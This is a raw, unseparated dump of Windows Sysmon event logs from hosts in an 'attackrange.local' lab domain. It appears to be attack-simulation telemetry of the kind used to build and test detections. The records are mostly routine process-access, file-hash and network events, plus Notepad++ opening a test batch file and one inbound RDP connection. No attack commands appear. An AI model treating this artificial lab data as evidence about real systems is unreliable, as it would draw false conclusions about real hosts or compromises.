07:44:45.181{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:45.181{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.181{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:45.181{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.181{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F2ED-60EB-EF7C-00000000CF01}8308C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.181{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F2ED-60EB-EF7C-00000000CF01}8308C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program 
Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001046069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.104{466BC892-F2ED-60EB-EF7C-00000000CF01}8308C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\test\sil.bat"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001046087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:46.826{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A712377678413825FCEDF78DE23755BD,SHA256=9FA53FFF7D8655EC511EDC3DA67737D04F568BAFDF3EA5BABA8F522BF25CEC6E,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000806200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:44.258{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57162-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:46.688{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8424C5AAA6D187615A9178FDB0D9949C,SHA256=FEB4EED2E5C2BA2362600A1F09983D01BA2FF8E8DA33FD40B6EF8B7719CDAD6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:46.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21C243F000BF643C33E1459C657CBF1B,SHA256=AAD7E5DA174707331F974733AE42127FF78084DEC6B668978CE9A4C40A1A966A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:46.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B698DD59E61EE1355A552D965121923,SHA256=200230CE5CB5CA47EFD61EFCE2B4A688FE1CA334B6D73CB13374A388BBB4D808,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001046084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:37.766{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50916-false10.0.1.12-8000- 23542300x80000000000000001046088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:47.827{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFE0D65673CCD1A917E8F4AC4ADE0CFF,SHA256=BE35A391DE3D43D3A3FBCAC6C5F329A389F1EF68579F5EC09525289AE67CAE2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:47.703{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FD4C99441BD81C57DF88667C3F85FEA,SHA256=FA21B87B2197C225B686922617EBC0878059B0F00F1DAC841CCD9C7C2C2AEBD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:48.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A40D68352189240F2C1474C98907A46F,SHA256=D9F1237EAE9850398CA71C6CA2AA9891B0B8BC1199445CC6501F8CF5ECF8FB90,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:48.735{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F27DC4B96876D6E83CB5A5F5BCAD8FBB,SHA256=17C69028908905CF20123D7109291815D99F641A41F6A9925895545AD3CCE3F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:49.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D1EE105141B04C880B1EB63436707CA,SHA256=8516F14431D45D02A2412FACF16E41BD6ABEEC13AB03E172ECDF8AD5175018D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:49.828{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203BB9818FEC45559421A34AABAA88E3,SHA256=A4F051449247BA1638ACE5EE8FB907DF044E56C1EF4CCE00FA15C726CB417E09,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:41.323{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-53160-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:49.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21C243F000BF643C33E1459C657CBF1B,SHA256=AAD7E5DA174707331F974733AE42127FF78084DEC6B668978CE9A4C40A1A966A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD9EB49C75079C164378F6BDAF1DD85B,SHA256=ADB83EBAA3A83CDD18BB363A16A5EFC398F0F358C877DD96D976DF8421E3763E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:49.383{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57163-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:50.828{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C737178379CA74F22499C5A9C1C875B,SHA256=EB93B0BE6B3F965957BE92265F850FC4F9E3803DA6860F052EB8168053E86244,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:50.862{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F2-60EB-F17C-00000000CF01}8836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2F2-60EB-F17C-00000000CF01}8836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F2-60EB-F17C-00000000CF01}8836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.856{466BC892-F2F2-60EB-F17C-00000000CF01}8836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001046101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.409{466BC892-F2F2-60EB-F07C-00000000CF01}90007968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.193{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F2-60EB-F07C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.193{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:50.193{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 